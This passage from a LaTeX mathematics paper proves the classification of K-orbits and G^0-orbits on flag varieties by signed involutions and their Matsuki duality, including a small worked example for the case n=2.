\end{equation}
It is clear that the group $K$ acts transitively on the set of
$w$-dual bases, hence $\mathcal{O}_w$ is a $K$-orbit. Moreover
(\ref{1}) implies that the orbits $\mathcal{O}_w$ (for
$w\in\mathfrak{I}_n^\epsilon$) are pairwise distinct. Similarly the
subsets $\mathfrak{O}_w$ (for $w\in\mathfrak{I}_n^\epsilon$) are
pairwise distinct $G^0$-orbits.
We denote by $L_k$ the $k\times k$ matrix with $1$ on the
antidiagonal and $0$ elsewhere. Let
$\underline{v}=(v_1,\ldots,v_n)$ be a $w_0$-dual basis, in other
words,
\[
\left\{
\begin{array}{ll}
\omega(v_k,v_{n+1-k})=\left\{\begin{array}{ll}
1 & \mbox{if $k\leq\frac{n+1}{2}$} \\[1mm] \epsilon & \mbox{if $k>\frac{n+1}{2}$}
\end{array}\right. \\[4mm]
\omega(v_k,v_\ell)=0\quad\mbox{if $\ell\not=n+1-k$;}
\end{array}
\right.
\]
hence $L:=\left(\omega(v_k,v_\ell)\right)_{1\leq k,\ell\leq n}$ is
the following matrix
\[
L=L_n\quad \mbox{(type A1)}\quad\mbox{or}\quad L=\left(\begin{matrix} 0 & L_m \\ -L_m & 0 \end{matrix}\right)\quad\mbox{(type A2, $n=2m$)}.
\]
The flag $\mathcal{F}_0:=\mathcal{F}(v_1,\ldots,v_n)$ satisfies the
condition $\mathcal{F}_0^\perp=\mathcal{F}_0$. By
Richardson--Springer \cite{Richardson-Springer} every $K$-orbit
$\mathcal{O}\subset X$ contains an element of the form
$g\mathcal{F}_0$ with $g\in G$ such that
$h:=L{}^t[g]_{\underline{v}}L^{-1}[g]_{\underline{v}}\in N$ where
$[g]_{\underline{v}}$ denotes the matrix of $g$ in the basis
$\underline{v}$ and $N$ stands for the group of invertible $n\times
n$ matrices with exactly one nonzero coefficient in each row
and each column. Note that
$Lh={}^t[g]_{\underline{v}}L[g]_{\underline{v}}$ also belongs to $N$
(as $L$ does) and is symmetric in type A1 and antisymmetric in
type A2. Consequently, there are $w\in\mathfrak{I}_n$ and constants
$t_1,\ldots,t_n\in\mathbb{C}^*$ such that the matrix
$Lh=:\left(a_{k,\ell}\right)_{1\leq k,\ell\leq n}$ has the following
entries:
\[
a_{k,\ell}=0\ \mbox{ if $\ell\not=w_k$,}\qquad
a_{k,w_k}=\left\{\begin{array}{ll} t_k & \mbox{if $w_k\geq k$}
\\ \epsilon t_k & \mbox{if $w_k\leq k$.}
\end{array}\right.
\]
Since $\epsilon=-1$ in type A2, we must have $w_k\not=k$ for all $k$,
hence $w\in\mathfrak{I}'_n$. Therefore in both cases
$w\in\mathfrak{I}^\epsilon_n$.
For each $k\in\{1,\ldots,n\}$, we
choose $s_k=s_{w_k}\in\mathbb{C}^*$ such that $s_k^{-2}=t_k$
(note that $t_{w_k}=t_k$).
Thus
\[g\mathcal{F}_0=\mathcal{F}(s_1gv_1,\ldots,s_ngv_n)\,,\]
and for all $k,\ell\in\{1,\ldots,n\}$ we have
\[
\omega(s_kgv_k,s_\ell g
v_\ell)=s_ks_\ell\omega(gv_k,gv_\ell)=s_ks_\ell
a_{k,\ell}=\left\{\begin{array}{ll} 1 & \mbox{if $\ell=w_k\geq k$}
\\ \epsilon & \mbox{if $\ell=w_k< k$} \\ 0 & \mbox{if
$\ell\not=w_k$}.
\end{array}\right.
\]
Whence $g\mathcal{F}_0\in\mathcal{O}_w$. This yields
$\mathcal{O}=\mathcal{O}_w$.
We have shown that the subsets $\mathcal{O}_w$ (for
$w\in\mathfrak{I}^\epsilon_n$) are precisely the $K$-orbits of $X$. In
particular, $X=\bigcup_{w\in\mathfrak{I}^\epsilon_n}\mathcal{O}_w$ so
that the inclusion (\ref{1}) is actually an equality. By Matsuki duality the
number of $G^0$-orbits of $X$ is the same as the number of
$K$-orbits, hence the subsets $\mathfrak{O}_w$ (for
$w\in\mathfrak{I}^\epsilon_n$) are exactly the $G^0$-orbits of $X$.
Thereby equality holds in (\ref{2}). Finally we have shown parts
{\rm (b)} and {\rm (c)} of the statement.
Part (a) implies that, for every $w\in\mathfrak{I}_n^\epsilon$, the intersection $\mathcal{O}_w\cap\mathfrak{O}_w$ is nonempty and consists of a single $K\cap G^0$-orbit.
This shows that the orbit $\mathfrak{O}_w$ is the Matsuki dual of $\mathcal{O}_w$ (see \cite{Matsuki3}), and part {\rm (d)} of the statement is also proved.
\end{proof}
\begin{proof}[Proof of Proposition \ref{P2}\,{\rm (a)}]
We write $w$ as a product of pairwise disjoint transpositions
$w=(a_1;b_1)\cdots(a_m;b_m)$,
and let $c_{m+1}<\ldots<c_p$ be the elements of $\{k:w_k=k,\ \varepsilon_k=+1\}$
and $d_{m+1}<\ldots<d_q$ be the elements of $\{k:w_k=k,\ \varepsilon_k=-1\}$.
Let $\{e_1,\ldots,e_n\}=\{e_1^+,\ldots,e_p^+\}\cup\{e_1^-,\ldots,e_q^-\}$
so that $V_+=\langle e_\ell^+:\ell=1,\ldots,p\rangle_\mathbb{C}$
and $V_-=\langle e_\ell^-:\ell=1,\ldots,q\rangle_\mathbb{C}$.
Setting
\begin{eqnarray*}
& v_{a_k}:=\frac{e^+_k+e^-_k}{\sqrt{2}}\,,\,\,\ v_{b_k}:=\frac{e^+_k-e^-_k}{\sqrt{2}}\ \mbox{ for all $k\in\{1,\ldots,m\}$,} \\
& v_{c_k}:=e^+_k\ \mbox{ for all $k\in\{m+1,\ldots,p\}$, \ and }\ v_{d_k}:=e^-_k\ \mbox{ for all $k\in\{m+1,\ldots,q\}$,}
\end{eqnarray*}
it is easy to see that $(v_1,\ldots,v_n)$ is a basis of $V$ which is
$(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate. Therefore
\begin{equation}
\label{3.5.14}
\emptyset\not=\{\mathcal{F}(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate}\}\subset \mathcal{O}_{(w,\varepsilon)}\cap\mathfrak{O}_{(w,\varepsilon)}.
\end{equation}
To show the reverse inclusion, consider
$\mathcal{F}=(F_0,\ldots,F_n)\in \mathcal{O}_{(w,\varepsilon)}\cap\mathfrak{O}_{(w,\varepsilon)}$.
On the one hand, since $\mathcal{F}\in\mathfrak{O}_{(w,\varepsilon)}$ there is a $(w,\varepsilon)$-dual basis $(v_1,\ldots,v_n)$ such that
$\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)$. On the other hand, the fact that $\mathcal{F}\in\mathcal{O}_{(w,\varepsilon)}$ yields
\begin{equation}
\label{8-new}
w_k=\min\{\ell=1,\ldots,n:\delta(F_k)\cap F_\ell\not=\delta(F_{k-1})\cap F_\ell\}\ \mbox{ for all $k\in\{1,\ldots,n\}$.}
\end{equation}
For all $\ell\in\{0,\ldots,n\}$ we will now construct a $(w,\varepsilon)$-dual basis
$(v_1^{(\ell)},\ldots,v_n^{(\ell)})$ such that
\begin{eqnarray}
\label{9-new}
& F_k=\langle v_1^{(\ell)},\ldots,v_k^{(\ell)}\rangle_\mathbb{C}\quad\mbox{for all $k\in\{1,\ldots,n\}$}
\\
\label{10-new}
\mbox{and} & \delta(v_k^{(\ell)})=\left\{\begin{array}{ll}
v_{w_k}^{(\ell)} & \mbox{if $w_k\not=k$,} \\
\varepsilon_k v_{k}^{(\ell)} & \mbox{if $w_k=k$} \\
\end{array}\right.\quad\mbox{for all $k\in\{1,\ldots,\ell\}$.}
\end{eqnarray}
This will then provide
a basis $(v_1^{(n)},\ldots,v_n^{(n)})$ which is both $(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate and such that
$\mathcal{F}=\mathcal{F}(v_1^{(n)},\ldots,v_n^{(n)})$, i.e., will complete the proof of part {\rm (a)}.
The construction is carried out by induction on $\ell\in\{0,\ldots,n\}$, and
is initialized by setting
$(v_1^{(0)},\ldots,v_n^{(0)}):=(v_1,\ldots,v_n)$. Let
$\ell\in\{1,\ldots,n\}$ be such that the basis
$(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ is already constructed. We
distinguish three cases.
\medskip
\noindent {\it Case 1: $w_\ell<\ell$.}
Since in this case $w_\ell\leq\ell-1$ and $w(w_\ell)=\ell$, we get
$\delta(v_{w_\ell}^{(\ell-1)})=v_{\ell}^{(\ell-1)}$ and hence
$\delta(v_{\ell}^{(\ell-1)})=v_{w_\ell}^{(\ell-1)}$ (as
$\delta$ is an involution). Therefore the basis
$(v_1^{(\ell)},\ldots,v_n^{(\ell)}):=(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$
satisfies conditions (\ref{9-new}) and (\ref{10-new}).
\medskip
\noindent {\it Case 2: $w_\ell=\ell$.}
Using (\ref{8-new}) we have
\[\delta(v_\ell^{(\ell-1)})\in\langle v_1^{(\ell-1)},v_2^{(\ell-1)},\ldots,v_\ell^{(\ell-1)}\rangle_\mathbb{C}+\langle v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}\,.\]
On the other hand, the fact that the basis
$(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ is
$(w,\varepsilon)$-conjugate implies
\begin{align}v_\ell^{(\ell-1)}\in\langle v_1^{(\ell-1)},\ldots,v_{\ell-1}^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}^\dag.
\label{E:induction}
\end{align}
Since $\delta$ preserves orthogonality with respect to the form
$\phi$ and since $\delta(v_k^{(\ell-1)})=v_{w_k}^{(\ell-1)}$
for all $k\in\{1,\ldots,\ell-1\}$ (by the induction hypothesis), (\ref{E:induction}) yields
\[\delta(v_\ell^{(\ell-1)})\in\langle v_1^{(\ell-1)},\ldots,v_{\ell-1}^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}^\dag.\]
Altogether we deduce that
\[\delta(v_\ell^{(\ell-1)})=\lambda
v_\ell^{(\ell-1)}\quad\mbox{for some $\lambda\in\mathbb{C}^*$.}\]
As $\delta$ is an involution, we conclude that $\lambda\in\{+1,-1\}$.
Moreover, knowing that
$\phi(v_\ell^{(\ell-1)},v_\ell^{(\ell-1)})=\varepsilon_\ell$ we see
that
\[\lambda\varepsilon_\ell=\phi(v_\ell^{(\ell-1)},\delta(v_\ell^{(\ell-1)}))={}^t\overline{v_\ell^{(\ell-1)}}\Phi\Phi v_\ell^{(\ell-1)}={}^t\overline{v_\ell^{(\ell-1)}}v_\ell^{(\ell-1)}>0.\]
Since $\lambda\in\{+1,-1\}$, this forces $\lambda=\varepsilon_\ell$. It follows that
the basis
$(v_1^{(\ell)},\ldots,v_n^{(\ell)}):=(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$
satisfies (\ref{9-new}) and (\ref{10-new}).
\medskip
\noindent {\it Case 3: $w_\ell>\ell$.}
Invoking (\ref{8-new}), the fact that
$(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ is
$(w,\varepsilon)$-dual, the induction hypothesis, and the fact
that $\delta$ preserves orthogonality with respect to $\phi$, we see as in Case 2 that
\begin{eqnarray*}
\delta(v_\ell^{(\ell-1)}) & \in & \big(\langle v_k^{(\ell-1)}:1\leq
k\leq w_\ell\rangle_\mathbb{C}+\langle v_{w_k}^{(\ell-1)}:1\leq k\leq
\ell-1\rangle_\mathbb{C}\big) \\
& & \cap\,\langle
v_1^{(\ell-1)},\ldots,v_{\ell-1}^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}^\dag.
\end{eqnarray*} Therefore
\begin{equation} \label{11-new}
\delta(v_\ell^{(\ell-1)})=\sum_{k\in
I}\lambda_kv_k^{(\ell-1)}\quad\mbox{with $\lambda_k\in\mathbb{C}$,}
\end{equation}
where $I:=\{k:\ell\leq k\leq w_\ell,\ \ell\leq w_k\}\subset\hat{I}:=\{k:\ell\leq k,\ \ell\leq w_k\}$.
This implies
\[\lambda_{w_\ell}=\phi(v_\ell^{(\ell-1)},\delta(v_\ell^{(\ell-1)}))={}^t\overline{v_\ell^{(\ell-1)}}\Phi\Phi v_\ell^{(\ell-1)}={}^t\overline{v_\ell^{(\ell-1)}}v_\ell^{(\ell-1)}\in\mathbb{R}_+^*.\]
It is straightforward to check that the basis
$(v_1^{(\ell)},\ldots,v_n^{(\ell)})$ defined by
\begin{eqnarray*}
& & v_\ell^{(\ell)}:=\frac{1}{\sqrt{\lambda_{w_\ell}}}v_\ell^{(\ell-1)},\quad
v_{w_\ell}^{(\ell)}:=\frac{1}{\sqrt{\lambda_{w_\ell}}}\delta(v_\ell^{(\ell-1)}),
\\
& & v_k^{(\ell)}:=v_k^{(\ell-1)}-\frac{\phi(v_k^{(\ell-1)},\delta(v_\ell^{(\ell-1)}))}{\lambda_{w_\ell}}v_\ell^{(\ell-1)}
\quad\mbox{for all $k\in \hat{I}\setminus\{\ell,w_\ell\}$,} \\
& & v_k^{(\ell)}:=v_k^{(\ell-1)}\quad\mbox{for all $k\in\{1,\ldots,n\}\setminus \hat{I}$}
\end{eqnarray*}
is $(w,\varepsilon)$-dual and satisfies conditions
(\ref{9-new}) and (\ref{10-new}).
\end{proof}
\begin{proof}[Proof of Proposition \ref{P2}\,{\rm (b)}--{\rm (d)}]
Let $\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)$ where
$(v_1,\ldots,v_n)$ is a $(w,\varepsilon)$-conjugate basis. Then by
definition we have
\[\delta(\langle v_1,\ldots,v_k\rangle_\mathbb{C})=\langle v_{w_j}:j\in\{1,\ldots,k\}\rangle_\mathbb{C}\,,\]
hence \begin{eqnarray*} \dim \delta(\langle
v_1,\ldots,v_k\rangle_\mathbb{C})\cap \langle v_1,\ldots,v_\ell\rangle_\mathbb{C} & = &
|\{j\in\{1,\ldots,\ell\}:w^{-1}_j\in\{1,\ldots,k\}\}| \\
& = &
|\{j\in\{1,\ldots,\ell\}:w_j\in\{1,\ldots,k\}\}|
\end{eqnarray*}
for all $k,\ell\in\{1,\ldots,n\}$. Moreover, for
$\varepsilon\in\{+1,-1\}$ we have
\begin{eqnarray*}
\langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}\cap\ker(\delta-\varepsilon\mathrm{id}) & =
&
\langle v_j:1\leq w_j=j\leq \ell\mbox{ and }\varepsilon_j=\varepsilon\rangle_\mathbb{C} \\
& & +\langle
v_j+\varepsilon v_{w_j}:1\leq w_j<j\leq \ell\rangle_\mathbb{C}\,.
\end{eqnarray*}
Therefore
\[
\big(\dim \langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}\cap V_+,\dim \langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}\cap V_-\big)_{\ell=1}^n=\varsigma(w,\varepsilon).
\]
Altogether this yields the inclusion
\begin{equation}
\label{3} \mathcal{O}_{(w,\varepsilon)}\subset\big\{\mathcal{F}\in
X: (\delta(\mathcal{F}),\mathcal{F})\in\mathbb{O}_{w}\mbox{ and
}\varsigma(\delta:\mathcal{F})=\varsigma(w,\varepsilon)\big\}.
\end{equation}
Now let $(v_1,\ldots,v_n)$ be a $(w,\varepsilon)$-dual basis. Then
\begin{eqnarray*}
\langle v_1,\ldots,v_{n-k}\rangle_\mathbb{C}^\dag\cap\langle
v_1,\ldots,v_\ell\rangle_\mathbb{C} & = & \langle
v_j:j\in\{1,\ldots,\ell\}\mbox{ and }w_j>n-k\rangle_\mathbb{C} \\
& = & \langle
v_j:j\in\{1,\ldots,\ell\}\mbox{ and }(w_0w)_j\leq k\rangle_\mathbb{C}\,,
\end{eqnarray*}
whence
\[\dim\langle v_1,\ldots,v_{n-k}\rangle_\mathbb{C}^\dag\cap\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}=|\{j\in\{1,\ldots,\ell\}:(w_0w)_j\in\{1,\ldots,k\}\}|\]
for all $k,\ell\in\{1,\ldots,n\}$. In particular we see that
\[\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}=\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}\cap\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}^\dag\oplus\langle v_j:
j\in\{1,\ldots,\ell\}\mbox{ and }w_j\leq \ell\rangle_\mathbb{C}.\] It follows
that the vectors $v_j$ (for $1\leq w_j=j\leq \ell$) and
$\frac{1}{\sqrt{2}}(v_j\pm v_{w_j})$ (for $1\leq w_j<j\leq \ell$)
form a basis of the quotient space $\langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}/\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}\cap\langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}^\dag$. This basis is $\phi$-orthogonal and,
since $(v_1,\ldots,v_n)$ is $(w,\varepsilon)$-dual, we have
\[
\textstyle \phi(v_j,v_j)=\varepsilon_j\mbox{ if $w_j=j$};\quad
\left\{\begin{array}{l}
\phi\big(\frac{v_j+v_{w_j}}{\sqrt{2}},\frac{v_j+v_{w_j}}{\sqrt{2}}\big)=1,\\[2mm]
\phi\big(\frac{v_j-v_{w_j}}{\sqrt{2}},\frac{v_j-v_{w_j}}{\sqrt{2}}\big)=-1
\end{array}\right.\mbox{ if $w_j<j$.}
\]
Therefore the signature of $\phi$ on $\langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}/\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}\cap\langle
v_1,\ldots,v_\ell\rangle_\mathbb{C}^\dag$ is the pair
\[
\begin{array}{rll}
\big( & |\{j:w_j=j\leq\ell,\
\varepsilon_j=+1\}|+|\{j:w_j<j\leq\ell\}|,
\\[2mm]
& |\{j:w_j=j\leq\ell,\
\varepsilon_j=-1\}|+|\{j:w_j<j\leq\ell\}| & \big)\end{array}
\]
which coincides with the $\ell$-th term of the sequence
$\varsigma(w,\varepsilon)$. Finally, we obtain the inclusion
\begin{equation}
\label{4} \mathfrak{O}_{(w,\varepsilon)}\subset\big\{\mathcal{F}\in
X: (\mathcal{F}^\dag,\mathcal{F})\in\mathbb{O}_{w_0w}\mbox{ and
}\varsigma(\phi:\mathcal{F})=\varsigma(w,\varepsilon)\big\}.
\end{equation}
It is clear that $K$ (resp., $G^0$) acts transitively on the set of
$(w,\varepsilon)$-conjugate bases (resp., $(w,\varepsilon)$-dual
bases). Hence the subsets $\mathcal{O}_{(w,\varepsilon)}$ (resp.,
$\mathfrak{O}_{(w,\varepsilon)}$) are $K$-orbits (resp.,
$G^0$-orbits). Moreover, in view of (\ref{3}) and (\ref{4}) these
orbits are pairwise distinct.
Let $\mathcal{O}$ be a $K$-orbit of $X$. Note that the basis $(e_1,\ldots,e_n)$ of
$V$ satisfies $\delta(e_j)=\pm
e_j$ for all $j$, hence the flag
$\mathcal{F}_0:=\mathcal{F}(e_1,\ldots,e_n)$ satisfies
$\delta(\mathcal{F}_0)=\mathcal{F}_0$. By
\cite{Richardson-Springer} the $K$-orbit $\mathcal{O}$ contains an
element of the form $g\mathcal{F}_0$ for some $g\in G$ such that
$h:=\Phi g^{-1}\Phi g\in N$ where, as in the proof of Proposition
\ref{P1}, $N\subset G$ stands for the subgroup of matrices with
exactly one nonzero entry in each row and each column. Since
$\Phi\in N$ we also have $\Phi h\in N$. Hence there is a permutation
$w\in\mathfrak{S}_n$ and constants
$t_1,\ldots,t_n\in\mathbb{C}^*$ such that the matrix $\Phi
h=:\big(a_{k,\ell}\big)_{1\leq k,\ell\leq n}$ has entries
\[a_{k,\ell}=0\ \mbox{ if $\ell\not=w_k$,}\quad a_{k,w_k}=t_k\quad\mbox{ for all $k,\ell\in\{1,\ldots,n\}$}.\]
The relation $\Phi h=g^{-1}\Phi g$ shows that $(\Phi h)^2=1_n$. This
yields $w^2=\mathrm{id}$ and $t_kt_{w_k}=1$ for all $k$; hence
\[t_{w_k}=t_k^{-1}\ \mbox{ whenever $w_k\not=k$}\quad\mbox{and}\quad \varepsilon_k:=t_k\in\{+1,-1\}\ \mbox{ whenever
$w_k=k$}.\] In addition, since $\Phi h$ is conjugate to $\Phi$, its
eigenvalues $+1$ and $-1$ have respective multiplicities $p$ and
$q$, which forces
\[(w,\varepsilon)\in\mathfrak{I}_n(p,q).\]
For each $k\in\{1,\ldots,n\}$ with $w_k<k$, we
take $s_k\in\mathbb{C}^*$ such that $t_k=s_k^2$ and set
$s_{w_k}=s_k^{-1}$ (so that $s_{w_k}^2=t_k^{-1}=t_{w_k}$). Moreover,
for each $k\in\{1,\ldots,n\}$ with $w_k=k$ we set $s_k=1$. The
equality $\Phi g=g\Phi h$ yields
\[
\delta(g(s_ke_k))=s_k\Phi g e_k=s_k g(\Phi h)e_k=s_k
g(t_{w_k}e_{w_k})=s_{w_k}^{-1}
g(s_{w_k}^2e_{w_k})=g(s_{w_k}e_{w_k})
\]
for all $k\in\{1,\ldots,n\}$ such that $w_k\not=k$, and
\[
\delta(g(s_k e_k))=\delta(g(e_k))=\Phi g e_k=g(\Phi
h)e_k=g(\varepsilon_k e_k)=\varepsilon_k g(e_k)=\varepsilon_k g(s_k
e_k)
\]
for all $k\in\{1,\ldots,n\}$ such that $w_k=k$. Hence the family
$(g(s_1 e_1),\ldots,g(s_n e_n))$ is a $(w,\varepsilon)$-conjugate basis of
$V$. Thus
\[g\mathcal{F}_0=g\mathcal{F}(e_1,\ldots,e_n)=g\mathcal{F}(s_1 e_1,\ldots,s_n e_n)=\mathcal{F}(g(s_1 e_1),\ldots,g(s_n e_n))\in\mathcal{O}_{(w,\varepsilon)}.\]
Therefore $\mathcal{O}=\mathcal{O}_{(w,\varepsilon)}$.
We conclude that the subsets $\mathcal{O}_{(w,\varepsilon)}$ (for
$(w,\varepsilon)\in\mathfrak{I}_n(p,q)$) are exactly the $K$-orbits
of $X$. Matsuki duality then guarantees that the subsets
$\mathfrak{O}_{(w,\varepsilon)}$ (for
$(w,\varepsilon)\in\mathfrak{I}_n(p,q)$) are exactly the
$G^0$-orbits of $X$. This fact implies in particular that
equality holds in (\ref{3}) and (\ref{4}). Altogether we have shown
parts {\rm (b)} and {\rm (c)} of the statement.
Finally, part {\rm (a)} shows that for every
$(w,\varepsilon)\in\mathfrak{I}_n(p,q)$ the intersection
$\mathcal{O}_{(w,\varepsilon)}\cap\mathfrak{O}_{(w,\varepsilon)}$
consists of a single $K\cap G^0$-orbit, which guarantees that the
orbits $\mathcal{O}_{(w,\varepsilon)}$ and
$\mathfrak{O}_{(w,\varepsilon)}$ are Matsuki dual (see
\cite{Matsuki,Matsuki3}). This proves part {\rm (d)} of the
statement. The proof of Proposition \ref{P2} is complete.
\end{proof}
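Before turning to Proposition \ref{P3}, the smallest instance of the parametrization in Proposition \ref{P2} may serve as an illustration (this standard example is added for orientation only and is not used in the proofs). Take $n=2$ and $p=q=1$, so that $X$ is the variety of complete flags in $\mathbb{C}^2$, i.e., $X\cong\mathbb{P}^1$.

```latex
% Smallest case n=2, p=q=1: X = P^1, with K the block-diagonal
% subgroup GL_1 x GL_1 and G^0 = U(1,1).
\mathfrak{I}_2(1,1)=\bigl\{(\mathrm{id},(+1,-1)),\ (\mathrm{id},(-1,+1)),\ \bigl((1\,2),\emptyset\bigr)\bigr\}.
% The two signed identities give the closed K-orbits {[V_+]} and {[V_-]},
% and (1 2) gives the open K-orbit of all remaining lines. Dually, the
% G^0-orbits are the two open sets of phi-positive and phi-negative
% lines and the closed circle of phi-isotropic lines; each Matsuki-dual
% pair meets in a single (K cap G^0)-orbit.
```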
\begin{proof}[Proof of Proposition \ref{P3}]
The proof relies on the following two technical claims.
\medskip
\noindent
{\it Claim 1:}
For every signed involution $(w,\varepsilon)\in\mathfrak{I}_n(p,q)$ we have
$\mathcal{O}_{(w,\varepsilon)}\cap X_\omega=\emptyset$ unless $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$.
\medskip
\noindent
{\it Claim 2:}
For every $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$ there is a basis $\underline{v}=(v_1,\ldots,v_n)$ which is simultaneously $(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate and satisfies (\ref{3.3.18}).
\medskip
Assuming Claims 1 and 2, the proof of the proposition proceeds as follows. For every $(w,\varepsilon)\in\mathfrak{I}_n(p,q)$ the inclusions
\begin{eqnarray}
\label{proof.P3.1} & \{\mathcal{F}(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-conjugate
and satisfies (\ref{3.3.18})}\}\subset\mathcal{O}_{(w,\varepsilon)}\cap X_\omega,
\\
\label{proof.P3.2} & \{\mathcal{F}(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-dual
and satisfies (\ref{3.3.18})}\}\subset\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega, \\
\label{proof.P3.3} & \{\mathcal{F}(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate and satisfies (\ref{3.3.18})}\}\\ \nonumber
& \subset
\mathcal{O}_{(w,\varepsilon)}\cap\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega
\end{eqnarray}
clearly hold. Hence Claim 2 shows that
$\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}$, $\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$, and
$\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}\cap\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ are all nonempty whenever $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$.
By Claim 1, Lemma \ref{lemma-2.2.1}, and Proposition \ref{P2}\,{\rm (c)}, the $K$-orbits of $X_\omega$ are exactly the subsets $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}$.
On the other hand the subsets $\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega$ (for $(w,\varepsilon)\in\mathfrak{I}_n(p,q)$) are $G^0$-stable and pairwise disjoint. By Matsuki duality there is a bijection between $K$-orbits and $G^0$-orbits. This forces $\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}=\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega$ to be a single $G^0$-orbit whenever $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$ and $\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega$ to be empty if $(w,\varepsilon)\notin\mathfrak{I}_n^{\eta,\epsilon}(p,q)$.
This proves Proposition \ref{P3}\,{\rm (b)}.
Since the orbits $\mathcal{O}_{(w,\varepsilon)},\mathfrak{O}_{(w,\varepsilon)}\subset X$ are Matsuki dual (see Proposition \ref{P2}\,{\rm (d)}), their intersection $\mathcal{O}_{(w,\varepsilon)}\cap\mathfrak{O}_{(w,\varepsilon)}$ is compact, hence so is the intersection $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}\cap
\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ for all $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$. This implies that $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ and $\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ are Matsuki dual (see \cite{Gindikin-Matsuki}), which proves part {\rm (c)} of the statement.
Let $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$. Since $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ and $\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ are Matsuki dual, their intersection is a single $K\cap G^0$-orbit. The set on the left-hand side in (\ref{proof.P3.3}) is nonempty (by Claim 2) and $K\cap G^0$-stable, hence equality holds in (\ref{proof.P3.3}). Similarly, the sets on the left-hand sides in (\ref{proof.P3.1}) and (\ref{proof.P3.2}) are nonempty (by Claim 2) and respectively $K$- and $G^0$-stable. Since $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}=\mathcal{O}_{(w,\varepsilon)}\cap X_\omega$ and $\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}=\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega$ are respectively a $K$-orbit and a $G^0$-orbit, equality holds in (\ref{proof.P3.1}) and (\ref{proof.P3.2}). This shows part {\rm (a)} of the statement.
Thus the proof of Proposition \ref{P3} will be complete once we establish Claims 1 and 2.
\medskip
\noindent
{\it Proof of Claim 1.}
Note that for two subspaces $A,B\subset V$ we have
$A^\perp+B^\perp=(A\cap B)^\perp$, hence
\begin{equation}
\label{proof-P3.4}
\dim A^\perp\cap B^\perp+\dim A+\dim B=\dim A\cap B+\dim V.
\end{equation}
Note also that the map $\delta$ is self-adjoint (in types BD1 and C2) or anti-adjoint (in types C1 and D3) with respect to $\omega$; hence in all types the equality $\delta(A)^\perp=\delta(A^\perp)$ holds for every subspace $A\subset V$.
Let $(w,\varepsilon)\in\mathfrak{I}_n(p,q)$ be such that $\mathcal{O}_{(w,\varepsilon)}\cap X_\omega\not=\emptyset$.
Let $\mathcal{F}=(F_0,\ldots,F_n)\in \mathcal{O}_{(w,\varepsilon)}\cap X_\omega$.
By applying (\ref{proof-P3.4}) to $A=\delta\left(F_k\right)$ and $B=F_\ell$ for $1\leq k,\ell\leq n$, and using that $A^\perp=\delta(F_k^\perp)=\delta(F_{n-k})$ and $B^\perp=F_{n-\ell}$ (as $\mathcal{F}\in X_\omega$), we obtain
\begin{equation}
\label{proof-P3.5}
\dim \delta\left( F_{n-k}\right)\cap F_{n-\ell}+k+\ell=\dim \delta \left(F_k\right)\cap F_\ell+n.
\end{equation}
On the other hand since $\mathcal{F}\in\mathcal{O}_{(w,\varepsilon)}$ Proposition \ref{P2}\,{\rm (b)} gives
\begin{equation}
